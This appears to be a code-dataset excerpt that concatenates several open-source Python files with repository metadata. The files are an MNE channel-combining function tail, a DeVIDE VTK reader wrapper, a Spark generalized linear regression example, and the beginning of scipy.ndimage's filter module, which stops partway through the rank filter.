# XXX Possibly de-duplicate with _make_combine_callable of mne/viz/utils.py
if isinstance(method, str):
method_dict = {key: partial(getattr(np, key), axis=ch_axis)
for key in ('mean', 'median', 'std')}
try:
method = method_dict[method]
except KeyError:
raise ValueError('"method" must be a callable, or one of "mean", '
f'"median", or "std"; got "{method}".')
# Instantiate channel info and data
new_ch_names, new_ch_types, new_data = [], [], []
if not isinstance(keep_stim, bool):
raise TypeError('"keep_stim" must be of type bool, not '
f'{type(keep_stim)}.')
if keep_stim:
stim_ch_idx = list(pick_types(inst.info, meg=False, stim=True))
if stim_ch_idx:
new_ch_names = [ch_names[idx] for idx in stim_ch_idx]
new_ch_types = [ch_types[idx] for idx in stim_ch_idx]
new_data = [np.take(inst_data, idx, axis=ch_axis)
for idx in stim_ch_idx]
else:
warn('Could not find stimulus channels.')
# Get indices of bad channels
ch_idx_bad = []
if not isinstance(drop_bad, bool):
raise TypeError('"drop_bad" must be of type bool, not '
f'{type(drop_bad)}.')
if drop_bad and inst.info['bads']:
ch_idx_bad = pick_channels(ch_names, inst.info['bads'])
# Check correctness of combinations
for this_group, this_picks in groups.items():
# Check if channel indices are out of bounds
if not all(idx in ch_idx for idx in this_picks):
raise ValueError('Some channel indices are out of bounds.')
# Check if heterogeneous sensor type combinations
this_ch_type = np.array(ch_types)[this_picks]
if len(set(this_ch_type)) > 1:
types = ', '.join(set(this_ch_type))
raise ValueError('Cannot combine sensors of different types; '
f'"{this_group}" contains types {types}.')
# Remove bad channels
these_bads = [idx for idx in this_picks if idx in ch_idx_bad]
this_picks = [idx for idx in this_picks if idx not in ch_idx_bad]
if these_bads:
logger.info('Dropped the following channels in group '
f'{this_group}: {these_bads}')
# Check if combining less than 2 channel
if len(set(this_picks)) < 2:
warn(f'Less than 2 channels in group "{this_group}" when '
f'combining by method "{method}".')
# If all good create more detailed dict without bad channels
groups[this_group] = dict(picks=this_picks, ch_type=this_ch_type[0])
# Combine channels and add them to the new instance
for this_group, this_group_dict in groups.items():
new_ch_names.append(this_group)
new_ch_types.append(this_group_dict['ch_type'])
this_picks = this_group_dict['picks']
this_data = np.take(inst_data, this_picks, axis=ch_axis)
new_data.append(method(this_data))
new_data = np.swapaxes(new_data, 0, ch_axis)
info = create_info(sfreq=inst.info['sfreq'], ch_names=new_ch_names,
ch_types=new_ch_types)
if isinstance(inst, BaseRaw):
combined_inst = RawArray(new_data, info, first_samp=inst.first_samp,
verbose=inst.verbose)
elif isinstance(inst, BaseEpochs):
combined_inst = EpochsArray(new_data, info, tmin=inst.times[0],
verbose=inst.verbose)
elif isinstance(inst, Evoked):
combined_inst = EvokedArray(new_data, info, tmin=inst.times[0],
verbose=inst.verbose)
return combined_inst
|
Teekuningas/mne-python
|
mne/channels/channels.py
|
Python
|
bsd-3-clause
| 66,479
|
[
"Mayavi"
] |
241d5f76705c3e88b9b463d1a9c39acddeb44aa0411a88c01ef6d0bc2d0a710c
|
# class generated by DeVIDE::createDeVIDEModuleFromVTKObject
from module_kits.vtk_kit.mixins import SimpleVTKClassModuleBase
import vtk
class vtkMFIXReader(SimpleVTKClassModuleBase):
def __init__(self, module_manager):
SimpleVTKClassModuleBase.__init__(
self, module_manager,
vtk.vtkMFIXReader(), 'Reading vtkMFIX.',
(), ('vtkMFIX',),
replaceDoc=True,
inputFunctions=None, outputFunctions=None)
|
nagyistoce/devide
|
modules/vtk_basic/vtkMFIXReader.py
|
Python
|
bsd-3-clause
| 468
|
[
"VTK"
] |
5754f251550747634045208d5d339ea2eaa09c916f9b8ee2f03a048fdd06b59b
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import print_function
from pyspark.sql import SparkSession
# $example on$
from pyspark.ml.regression import GeneralizedLinearRegression
# $example off$
"""
An example demonstrating generalized linear regression.
Run with:
bin/spark-submit examples/src/main/python/ml/generalized_linear_regression_example.py
"""
if __name__ == "__main__":
spark = SparkSession\
.builder\
.appName("GeneralizedLinearRegressionExample")\
.getOrCreate()
# $example on$
# Load training data
dataset = spark.read.format("libsvm")\
.load("data/mllib/sample_linear_regression_data.txt")
glr = GeneralizedLinearRegression(family="gaussian", link="identity", maxIter=10, regParam=0.3)
# Fit the model
model = glr.fit(dataset)
# Print the coefficients and intercept for generalized linear regression model
print("Coefficients: " + str(model.coefficients))
print("Intercept: " + str(model.intercept))
# Summarize the model over the training set and print out some metrics
summary = model.summary
print("Coefficient Standard Errors: " + str(summary.coefficientStandardErrors))
print("T Values: " + str(summary.tValues))
print("P Values: " + str(summary.pValues))
print("Dispersion: " + str(summary.dispersion))
print("Null Deviance: " + str(summary.nullDeviance))
print("Residual Degree Of Freedom Null: " + str(summary.residualDegreeOfFreedomNull))
print("Deviance: " + str(summary.deviance))
print("Residual Degree Of Freedom: " + str(summary.residualDegreeOfFreedom))
print("AIC: " + str(summary.aic))
print("Deviance Residuals: ")
summary.residuals().show()
# $example off$
spark.stop()
|
fharenheit/template-spark-app
|
src/main/python/ml/generalized_linear_regression_example.py
|
Python
|
apache-2.0
| 2,506
|
[
"Gaussian"
] |
9a2f4b4205a6797f30345bfa55669ffa6ec6af07fd8c143c4316b6dd6dba9622
|
# Copyright (C) 2003-2005 Peter J. Verveer
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
#
# 3. The name of the author may not be used to endorse or promote
# products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS
# OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE
# GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from __future__ import division, print_function, absolute_import
import math
import numpy
from . import _ni_support
from . import _nd_image
from scipy.misc import doccer
__all__ = ['correlate1d', 'convolve1d', 'gaussian_filter1d', 'gaussian_filter',
'prewitt', 'sobel', 'generic_laplace', 'laplace',
'gaussian_laplace', 'generic_gradient_magnitude',
'gaussian_gradient_magnitude', 'correlate', 'convolve',
'uniform_filter1d', 'uniform_filter', 'minimum_filter1d',
'maximum_filter1d', 'minimum_filter', 'maximum_filter',
'rank_filter', 'median_filter', 'percentile_filter',
'generic_filter1d', 'generic_filter']
_input_doc = \
"""input : array_like
Input array to filter."""
_axis_doc = \
"""axis : int, optional
The axis of `input` along which to calculate. Default is -1."""
_output_doc = \
"""output : array, optional
The `output` parameter passes an array in which to store the
filter output."""
_size_foot_doc = \
"""size : scalar or tuple, optional
See footprint, below
footprint : array, optional
Either `size` or `footprint` must be defined. `size` gives
the shape that is taken from the input array, at every element
position, to define the input to the filter function.
`footprint` is a boolean array that specifies (implicitly) a
shape, but also which of the elements within this shape will get
passed to the filter function. Thus ``size=(n,m)`` is equivalent
to ``footprint=np.ones((n,m))``. We adjust `size` to the number
of dimensions of the input array, so that, if the input array is
shape (10,10,10), and `size` is 2, then the actual size used is
(2,2,2).
"""
_mode_doc = \
"""mode : {'reflect', 'constant', 'nearest', 'mirror', 'wrap'}, optional
The `mode` parameter determines how the array borders are
handled, where `cval` is the value when mode is equal to
'constant'. Default is 'reflect'"""
_cval_doc = \
"""cval : scalar, optional
Value to fill past edges of input if `mode` is 'constant'. Default
is 0.0"""
_origin_doc = \
"""origin : scalar, optional
The `origin` parameter controls the placement of the filter.
Default 0.0."""
_extra_arguments_doc = \
"""extra_arguments : sequence, optional
Sequence of extra positional arguments to pass to passed function"""
_extra_keywords_doc = \
"""extra_keywords : dict, optional
dict of extra keyword arguments to pass to passed function"""
docdict = {
'input':_input_doc,
'axis':_axis_doc,
'output':_output_doc,
'size_foot':_size_foot_doc,
'mode':_mode_doc,
'cval':_cval_doc,
'origin':_origin_doc,
'extra_arguments':_extra_arguments_doc,
'extra_keywords':_extra_keywords_doc,
}
docfiller = doccer.filldoc(docdict)
@docfiller
def correlate1d(input, weights, axis=-1, output=None, mode="reflect",
cval=0.0, origin=0):
"""Calculate a one-dimensional correlation along the given axis.
The lines of the array along the given axis are correlated with the
given weights.
Parameters
----------
%(input)s
weights : array
One-dimensional sequence of numbers.
%(axis)s
%(output)s
%(mode)s
%(cval)s
%(origin)s
"""
input = numpy.asarray(input)
if numpy.iscomplexobj(input):
raise TypeError('Complex type not supported')
output, return_value = _ni_support._get_output(output, input)
weights = numpy.asarray(weights, dtype=numpy.float64)
if weights.ndim != 1 or weights.shape[0] < 1:
raise RuntimeError('no filter weights given')
if not weights.flags.contiguous:
weights = weights.copy()
axis = _ni_support._check_axis(axis, input.ndim)
if ((len(weights) // 2 + origin < 0) or
(len(weights) // 2 + origin > len(weights))):
raise ValueError('invalid origin')
mode = _ni_support._extend_mode_to_code(mode)
_nd_image.correlate1d(input, weights, axis, output, mode, cval,
origin)
return return_value
@docfiller
def convolve1d(input, weights, axis=-1, output=None, mode="reflect",
cval=0.0, origin=0):
"""Calculate a one-dimensional convolution along the given axis.
The lines of the array along the given axis are convolved with the
given weights.
Parameters
----------
%(input)s
weights : ndarray
One-dimensional sequence of numbers.
%(axis)s
%(output)s
%(mode)s
%(cval)s
%(origin)s
Returns
-------
convolve1d : ndarray
Convolved array with same shape as input
"""
weights = weights[::-1]
origin = -origin
if not len(weights) & 1:
origin -= 1
return correlate1d(input, weights, axis, output, mode, cval, origin)
@docfiller
def gaussian_filter1d(input, sigma, axis=-1, order=0, output=None,
mode="reflect", cval=0.0):
"""One-dimensional Gaussian filter.
Parameters
----------
%(input)s
sigma : scalar
standard deviation for Gaussian kernel
%(axis)s
order : {0, 1, 2, 3}, optional
An order of 0 corresponds to convolution with a Gaussian
kernel. An order of 1, 2, or 3 corresponds to convolution with
the first, second or third derivatives of a Gaussian. Higher
order derivatives are not implemented
%(output)s
%(mode)s
%(cval)s
Returns
-------
gaussian_filter1d : ndarray
"""
if order not in range(4):
raise ValueError('Order outside 0..3 not implemented')
sd = float(sigma)
# make the length of the filter equal to 4 times the standard
# deviations:
lw = int(4.0 * sd + 0.5)
weights = [0.0] * (2 * lw + 1)
weights[lw] = 1.0
sum = 1.0
sd = sd * sd
# calculate the kernel:
for ii in range(1, lw + 1):
tmp = math.exp(-0.5 * float(ii * ii) / sd)
weights[lw + ii] = tmp
weights[lw - ii] = tmp
sum += 2.0 * tmp
for ii in range(2 * lw + 1):
weights[ii] /= sum
# implement first, second and third order derivatives:
if order == 1: # first derivative
weights[lw] = 0.0
for ii in range(1, lw + 1):
x = float(ii)
tmp = -x / sd * weights[lw + ii]
weights[lw + ii] = -tmp
weights[lw - ii] = tmp
elif order == 2: # second derivative
weights[lw] *= -1.0 / sd
for ii in range(1, lw + 1):
x = float(ii)
tmp = (x * x / sd - 1.0) * weights[lw + ii] / sd
weights[lw + ii] = tmp
weights[lw - ii] = tmp
elif order == 3: # third derivative
weights[lw] = 0.0
sd2 = sd * sd
for ii in range(1, lw + 1):
x = float(ii)
tmp = (3.0 - x * x / sd) * x * weights[lw + ii] / sd2
weights[lw + ii] = -tmp
weights[lw - ii] = tmp
return correlate1d(input, weights, axis, output, mode, cval, 0)
@docfiller
def gaussian_filter(input, sigma, order=0, output=None,
mode="reflect", cval=0.0):
"""Multidimensional Gaussian filter.
Parameters
----------
%(input)s
sigma : scalar or sequence of scalars
Standard deviation for Gaussian kernel. The standard
deviations of the Gaussian filter are given for each axis as a
sequence, or as a single number, in which case it is equal for
all axes.
order : {0, 1, 2, 3} or sequence from same set, optional
The order of the filter along each axis is given as a sequence
of integers, or as a single number. An order of 0 corresponds
to convolution with a Gaussian kernel. An order of 1, 2, or 3
corresponds to convolution with the first, second or third
derivatives of a Gaussian. Higher order derivatives are not
implemented
%(output)s
%(mode)s
%(cval)s
Returns
-------
gaussian_filter : ndarray
Returned array of same shape as `input`.
Notes
-----
The multidimensional filter is implemented as a sequence of
one-dimensional convolution filters. The intermediate arrays are
stored in the same data type as the output. Therefore, for output
types with a limited precision, the results may be imprecise
because intermediate results may be stored with insufficient
precision.
"""
input = numpy.asarray(input)
output, return_value = _ni_support._get_output(output, input)
orders = _ni_support._normalize_sequence(order, input.ndim)
if not set(orders).issubset(set(range(4))):
raise ValueError('Order outside 0..4 not implemented')
sigmas = _ni_support._normalize_sequence(sigma, input.ndim)
axes = list(range(input.ndim))
axes = [(axes[ii], sigmas[ii], orders[ii])
for ii in range(len(axes)) if sigmas[ii] > 1e-15]
if len(axes) > 0:
for axis, sigma, order in axes:
gaussian_filter1d(input, sigma, axis, order, output,
mode, cval)
input = output
else:
output[...] = input[...]
return return_value
@docfiller
def prewitt(input, axis=-1, output=None, mode="reflect", cval=0.0):
"""Calculate a Prewitt filter.
Parameters
----------
%(input)s
%(axis)s
%(output)s
%(mode)s
%(cval)s
"""
input = numpy.asarray(input)
axis = _ni_support._check_axis(axis, input.ndim)
output, return_value = _ni_support._get_output(output, input)
correlate1d(input, [-1, 0, 1], axis, output, mode, cval, 0)
axes = [ii for ii in range(input.ndim) if ii != axis]
for ii in axes:
correlate1d(output, [1, 1, 1], ii, output, mode, cval, 0,)
return return_value
@docfiller
def sobel(input, axis=-1, output=None, mode="reflect", cval=0.0):
"""Calculate a Sobel filter.
Parameters
----------
%(input)s
%(axis)s
%(output)s
%(mode)s
%(cval)s
"""
input = numpy.asarray(input)
axis = _ni_support._check_axis(axis, input.ndim)
output, return_value = _ni_support._get_output(output, input)
correlate1d(input, [-1, 0, 1], axis, output, mode, cval, 0)
axes = [ii for ii in range(input.ndim) if ii != axis]
for ii in axes:
correlate1d(output, [1, 2, 1], ii, output, mode, cval, 0)
return return_value
@docfiller
def generic_laplace(input, derivative2, output=None, mode="reflect",
cval=0.0,
extra_arguments=(),
extra_keywords = None):
"""N-dimensional Laplace filter using a provided second derivative function
Parameters
----------
%(input)s
derivative2 : callable
Callable with the following signature::
derivative2(input, axis, output, mode, cval,
*extra_arguments, **extra_keywords)
See `extra_arguments`, `extra_keywords` below.
%(output)s
%(mode)s
%(cval)s
%(extra_keywords)s
%(extra_arguments)s
"""
if extra_keywords is None:
extra_keywords = {}
input = numpy.asarray(input)
output, return_value = _ni_support._get_output(output, input)
axes = list(range(input.ndim))
if len(axes) > 0:
derivative2(input, axes[0], output, mode, cval,
*extra_arguments, **extra_keywords)
for ii in range(1, len(axes)):
tmp = derivative2(input, axes[ii], output.dtype, mode, cval,
*extra_arguments, **extra_keywords)
output += tmp
else:
output[...] = input[...]
return return_value
@docfiller
def laplace(input, output=None, mode="reflect", cval=0.0):
"""N-dimensional Laplace filter based on approximate second derivatives.
Parameters
----------
%(input)s
%(output)s
%(mode)s
%(cval)s
"""
def derivative2(input, axis, output, mode, cval):
return correlate1d(input, [1, -2, 1], axis, output, mode, cval, 0)
return generic_laplace(input, derivative2, output, mode, cval)
@docfiller
def gaussian_laplace(input, sigma, output=None, mode="reflect",
cval=0.0):
"""Multidimensional Laplace filter using gaussian second derivatives.
Parameters
----------
%(input)s
sigma : scalar or sequence of scalars
The standard deviations of the Gaussian filter are given for
each axis as a sequence, or as a single number, in which case
it is equal for all axes.
%(output)s
%(mode)s
%(cval)s
"""
input = numpy.asarray(input)
def derivative2(input, axis, output, mode, cval, sigma):
order = [0] * input.ndim
order[axis] = 2
return gaussian_filter(input, sigma, order, output, mode, cval)
return generic_laplace(input, derivative2, output, mode, cval,
extra_arguments=(sigma,))
@docfiller
def generic_gradient_magnitude(input, derivative, output=None,
mode="reflect", cval=0.0,
extra_arguments=(), extra_keywords = None):
"""Gradient magnitude using a provided gradient function.
Parameters
----------
%(input)s
derivative : callable
Callable with the following signature::
derivative(input, axis, output, mode, cval,
*extra_arguments, **extra_keywords)
See `extra_arguments`, `extra_keywords` below.
`derivative` can assume that `input` and `output` are ndarrays.
Note that the output from `derivative` is modified inplace;
be careful to copy important inputs before returning them.
%(output)s
%(mode)s
%(cval)s
%(extra_keywords)s
%(extra_arguments)s
"""
if extra_keywords is None:
extra_keywords = {}
input = numpy.asarray(input)
output, return_value = _ni_support._get_output(output, input)
axes = list(range(input.ndim))
if len(axes) > 0:
derivative(input, axes[0], output, mode, cval,
*extra_arguments, **extra_keywords)
numpy.multiply(output, output, output)
for ii in range(1, len(axes)):
tmp = derivative(input, axes[ii], output.dtype, mode, cval,
*extra_arguments, **extra_keywords)
numpy.multiply(tmp, tmp, tmp)
output += tmp
# This allows the sqrt to work with a different default casting
if numpy.version.short_version > '1.6.1':
numpy.sqrt(output, output, casting='unsafe')
else:
numpy.sqrt(output, output)
else:
output[...] = input[...]
return return_value
@docfiller
def gaussian_gradient_magnitude(input, sigma, output=None,
mode="reflect", cval=0.0):
"""Multidimensional gradient magnitude using Gaussian derivatives.
Parameters
----------
%(input)s
sigma : scalar or sequence of scalars
The standard deviations of the Gaussian filter are given for
each axis as a sequence, or as a single number, in which case
it is equal for all axes..
%(output)s
%(mode)s
%(cval)s
"""
input = numpy.asarray(input)
def derivative(input, axis, output, mode, cval, sigma):
order = [0] * input.ndim
order[axis] = 1
return gaussian_filter(input, sigma, order, output, mode, cval)
return generic_gradient_magnitude(input, derivative, output, mode,
cval, extra_arguments=(sigma,))
def _correlate_or_convolve(input, weights, output, mode, cval, origin,
convolution):
input = numpy.asarray(input)
if numpy.iscomplexobj(input):
raise TypeError('Complex type not supported')
origins = _ni_support._normalize_sequence(origin, input.ndim)
weights = numpy.asarray(weights, dtype=numpy.float64)
wshape = [ii for ii in weights.shape if ii > 0]
if len(wshape) != input.ndim:
raise RuntimeError('filter weights array has incorrect shape.')
if convolution:
weights = weights[tuple([slice(None, None, -1)] * weights.ndim)]
for ii in range(len(origins)):
origins[ii] = -origins[ii]
if not weights.shape[ii] & 1:
origins[ii] -= 1
for origin, lenw in zip(origins, wshape):
if (lenw // 2 + origin < 0) or (lenw // 2 + origin > lenw):
raise ValueError('invalid origin')
if not weights.flags.contiguous:
weights = weights.copy()
output, return_value = _ni_support._get_output(output, input)
mode = _ni_support._extend_mode_to_code(mode)
_nd_image.correlate(input, weights, output, mode, cval, origins)
return return_value
@docfiller
def correlate(input, weights, output=None, mode='reflect', cval=0.0,
origin=0):
"""
Multi-dimensional correlation.
The array is correlated with the given kernel.
Parameters
----------
input : array-like
input array to filter
weights : ndarray
array of weights, same number of dimensions as input
output : array, optional
The ``output`` parameter passes an array in which to store the
filter output.
mode : {'reflect','constant','nearest','mirror', 'wrap'}, optional
The ``mode`` parameter determines how the array borders are
handled, where ``cval`` is the value when mode is equal to
'constant'. Default is 'reflect'
cval : scalar, optional
Value to fill past edges of input if ``mode`` is 'constant'. Default
is 0.0
origin : scalar, optional
The ``origin`` parameter controls the placement of the filter.
Default 0
See Also
--------
convolve : Convolve an image with a kernel.
"""
return _correlate_or_convolve(input, weights, output, mode, cval,
origin, False)
@docfiller
def convolve(input, weights, output=None, mode='reflect', cval=0.0,
origin=0):
"""
Multidimensional convolution.
The array is convolved with the given kernel.
Parameters
----------
input : array_like
Input array to filter.
weights : array_like
Array of weights, same number of dimensions as input
output : ndarray, optional
The `output` parameter passes an array in which to store the
filter output.
mode : {'reflect','constant','nearest','mirror', 'wrap'}, optional
the `mode` parameter determines how the array borders are
handled. For 'constant' mode, values beyond borders are set to be
`cval`. Default is 'reflect'.
cval : scalar, optional
Value to fill past edges of input if `mode` is 'constant'. Default
is 0.0
origin : array_like, optional
The `origin` parameter controls the placement of the filter.
Default is 0.
Returns
-------
result : ndarray
The result of convolution of `input` with `weights`.
See Also
--------
correlate : Correlate an image with a kernel.
Notes
-----
Each value in result is :math:`C_i = \\sum_j{I_{i+j-k} W_j}`, where
W is the `weights` kernel,
j is the n-D spatial index over :math:`W`,
I is the `input` and k is the coordinate of the center of
W, specified by `origin` in the input parameters.
Examples
--------
Perhaps the simplest case to understand is ``mode='constant', cval=0.0``,
because in this case borders (i.e. where the `weights` kernel, centered
on any one value, extends beyond an edge of `input`.
>>> a = np.array([[1, 2, 0, 0],
.... [5, 3, 0, 4],
.... [0, 0, 0, 7],
.... [9, 3, 0, 0]])
>>> k = np.array([[1,1,1],[1,1,0],[1,0,0]])
>>> from scipy import ndimage
>>> ndimage.convolve(a, k, mode='constant', cval=0.0)
array([[11, 10, 7, 4],
[10, 3, 11, 11],
[15, 12, 14, 7],
[12, 3, 7, 0]])
Setting ``cval=1.0`` is equivalent to padding the outer edge of `input`
with 1.0's (and then extracting only the original region of the result).
>>> ndimage.convolve(a, k, mode='constant', cval=1.0)
array([[13, 11, 8, 7],
[11, 3, 11, 14],
[16, 12, 14, 10],
[15, 6, 10, 5]])
With ``mode='reflect'`` (the default), outer values are reflected at the
edge of `input` to fill in missing values.
>>> b = np.array([[2, 0, 0],
[1, 0, 0],
[0, 0, 0]])
>>> k = np.array([[0,1,0],[0,1,0],[0,1,0]])
>>> ndimage.convolve(b, k, mode='reflect')
array([[5, 0, 0],
[3, 0, 0],
[1, 0, 0]])
This includes diagonally at the corners.
>>> k = np.array([[1,0,0],[0,1,0],[0,0,1]])
>>> ndimage.convolve(b, k)
array([[4, 2, 0],
[3, 2, 0],
[1, 1, 0]])
With ``mode='nearest'``, the single nearest value in to an edge in
`input` is repeated as many times as needed to match the overlapping
`weights`.
>>> c = np.array([[2, 0, 1],
[1, 0, 0],
[0, 0, 0]])
>>> k = np.array([[0, 1, 0],
[0, 1, 0],
[0, 1, 0],
[0, 1, 0],
[0, 1, 0]])
>>> ndimage.convolve(c, k, mode='nearest')
array([[7, 0, 3],
[5, 0, 2],
[3, 0, 1]])
"""
return _correlate_or_convolve(input, weights, output, mode, cval,
origin, True)
@docfiller
def uniform_filter1d(input, size, axis=-1, output=None,
mode="reflect", cval=0.0, origin=0):
"""Calculate a one-dimensional uniform filter along the given axis.
The lines of the array along the given axis are filtered with a
uniform filter of given size.
Parameters
----------
%(input)s
size : integer
length of uniform filter
%(axis)s
%(output)s
%(mode)s
%(cval)s
%(origin)s
"""
input = numpy.asarray(input)
if numpy.iscomplexobj(input):
raise TypeError('Complex type not supported')
axis = _ni_support._check_axis(axis, input.ndim)
if size < 1:
raise RuntimeError('incorrect filter size')
output, return_value = _ni_support._get_output(output, input)
if (size // 2 + origin < 0) or (size // 2 + origin >= size):
raise ValueError('invalid origin')
mode = _ni_support._extend_mode_to_code(mode)
_nd_image.uniform_filter1d(input, size, axis, output, mode, cval,
origin)
return return_value
@docfiller
def uniform_filter(input, size=3, output=None, mode="reflect",
cval=0.0, origin=0):
"""Multi-dimensional uniform filter.
Parameters
----------
%(input)s
size : int or sequence of ints
The sizes of the uniform filter are given for each axis as a
sequence, or as a single number, in which case the size is
equal for all axes.
%(output)s
%(mode)s
%(cval)s
%(origin)s
Notes
-----
The multi-dimensional filter is implemented as a sequence of
one-dimensional uniform filters. The intermediate arrays are stored
in the same data type as the output. Therefore, for output types
with a limited precision, the results may be imprecise because
intermediate results may be stored with insufficient precision.
"""
input = numpy.asarray(input)
output, return_value = _ni_support._get_output(output, input)
sizes = _ni_support._normalize_sequence(size, input.ndim)
origins = _ni_support._normalize_sequence(origin, input.ndim)
axes = list(range(input.ndim))
axes = [(axes[ii], sizes[ii], origins[ii])
for ii in range(len(axes)) if sizes[ii] > 1]
if len(axes) > 0:
for axis, size, origin in axes:
uniform_filter1d(input, int(size), axis, output, mode,
cval, origin)
input = output
else:
output[...] = input[...]
return return_value
@docfiller
def minimum_filter1d(input, size, axis=-1, output=None,
mode="reflect", cval=0.0, origin=0):
"""Calculate a one-dimensional minimum filter along the given axis.
The lines of the array along the given axis are filtered with a
minimum filter of given size.
Parameters
----------
%(input)s
size : int
length along which to calculate 1D minimum
%(axis)s
%(output)s
%(mode)s
%(cval)s
%(origin)s
"""
input = numpy.asarray(input)
if numpy.iscomplexobj(input):
raise TypeError('Complex type not supported')
axis = _ni_support._check_axis(axis, input.ndim)
if size < 1:
raise RuntimeError('incorrect filter size')
output, return_value = _ni_support._get_output(output, input)
if (size // 2 + origin < 0) or (size // 2 + origin >= size):
raise ValueError('invalid origin')
mode = _ni_support._extend_mode_to_code(mode)
_nd_image.min_or_max_filter1d(input, size, axis, output, mode, cval,
origin, 1)
return return_value
@docfiller
def maximum_filter1d(input, size, axis=-1, output=None,
mode="reflect", cval=0.0, origin=0):
"""Calculate a one-dimensional maximum filter along the given axis.
The lines of the array along the given axis are filtered with a
maximum filter of given size.
Parameters
----------
%(input)s
size : int
Length along which to calculate the 1-D maximum.
%(axis)s
%(output)s
%(mode)s
%(cval)s
%(origin)s
"""
input = numpy.asarray(input)
if numpy.iscomplexobj(input):
raise TypeError('Complex type not supported')
axis = _ni_support._check_axis(axis, input.ndim)
if size < 1:
raise RuntimeError('incorrect filter size')
output, return_value = _ni_support._get_output(output, input)
if (size // 2 + origin < 0) or (size // 2 + origin >= size):
raise ValueError('invalid origin')
mode = _ni_support._extend_mode_to_code(mode)
_nd_image.min_or_max_filter1d(input, size, axis, output, mode, cval,
origin, 0)
return return_value
def _min_or_max_filter(input, size, footprint, structure, output, mode,
cval, origin, minimum):
if structure is None:
if footprint is None:
if size is None:
raise RuntimeError("no footprint provided")
separable = True
else:
footprint = numpy.asarray(footprint)
footprint = footprint.astype(bool)
if numpy.alltrue(numpy.ravel(footprint),axis=0):
size = footprint.shape
footprint = None
separable = True
else:
separable = False
else:
structure = numpy.asarray(structure, dtype=numpy.float64)
separable = False
if footprint is None:
footprint = numpy.ones(structure.shape, bool)
else:
footprint = numpy.asarray(footprint)
footprint = footprint.astype(bool)
input = numpy.asarray(input)
if numpy.iscomplexobj(input):
raise TypeError('Complex type not supported')
output, return_value = _ni_support._get_output(output, input)
origins = _ni_support._normalize_sequence(origin, input.ndim)
if separable:
sizes = _ni_support._normalize_sequence(size, input.ndim)
axes = list(range(input.ndim))
axes = [(axes[ii], sizes[ii], origins[ii])
for ii in range(len(axes)) if sizes[ii] > 1]
if minimum:
filter_ = minimum_filter1d
else:
filter_ = maximum_filter1d
if len(axes) > 0:
for axis, size, origin in axes:
filter_(input, int(size), axis, output, mode, cval, origin)
input = output
else:
output[...] = input[...]
else:
fshape = [ii for ii in footprint.shape if ii > 0]
if len(fshape) != input.ndim:
raise RuntimeError('footprint array has incorrect shape.')
for origin, lenf in zip(origins, fshape):
if (lenf // 2 + origin < 0) or (lenf // 2 + origin >= lenf):
raise ValueError('invalid origin')
if not footprint.flags.contiguous:
footprint = footprint.copy()
if structure is not None:
if len(structure.shape) != input.ndim:
raise RuntimeError('structure array has incorrect shape')
if not structure.flags.contiguous:
structure = structure.copy()
mode = _ni_support._extend_mode_to_code(mode)
_nd_image.min_or_max_filter(input, footprint, structure, output,
mode, cval, origins, minimum)
return return_value
@docfiller
def minimum_filter(input, size=None, footprint=None, output=None,
mode="reflect", cval=0.0, origin=0):
"""Calculates a multi-dimensional minimum filter.
Parameters
----------
%(input)s
%(size_foot)s
%(output)s
%(mode)s
%(cval)s
%(origin)s
"""
return _min_or_max_filter(input, size, footprint, None, output, mode,
cval, origin, 1)
@docfiller
def maximum_filter(input, size=None, footprint=None, output=None,
mode="reflect", cval=0.0, origin=0):
"""Calculates a multi-dimensional maximum filter.
Parameters
----------
%(input)s
%(size_foot)s
%(output)s
%(mode)s
%(cval)s
%(origin)s
"""
return _min_or_max_filter(input, size, footprint, None, output, mode,
cval, origin, 0)
@docfiller
def _rank_filter(input, rank, size=None, footprint=None, output=None,
mode="reflect", cval=0.0, origin=0, operation='rank'):
input = numpy.asarray(input)
if numpy.iscomplexobj(input):
raise TypeError('Complex type not supported')
origins = _ni_support._normalize_sequence(origin, input.ndim)
if footprint is None:
if size is None:
raise RuntimeError("no footprint or filter size provided")
sizes = _ni_support._normalize_sequence(size, input.ndim)
footprint = numpy.ones(sizes, dtype=bool)
else:
footprint = numpy.asarray(footprint, dtype=bool)
fshape = [ii for ii in footprint.shape if ii > 0]
if len(fshape) != input.ndim:
raise RuntimeError('filter footprint array has incorrect shape.')
for origin, lenf in zip(origins, fshape):
if (lenf // 2 + origin < 0) or (lenf // 2 + origin >= lenf):
raise ValueError('invalid origin')
if not footprint.flags.contiguous:
footprint = footprint.copy()
filter_size = numpy.where(footprint, 1, 0).sum()
if operation == 'median':
rank = filter_size // 2
elif operation == 'percentile':
percentile = rank
if percentile < 0.0:
percentile += 100.0
if percentile < 0 or percentile > 100:
raise RuntimeError('invalid percentile')
if percentile == 100.0:
rank = filter_size - 1
else:
rank = int(float(filter_size) * percentile / 100.0)
if rank < 0:
rank += filter_size
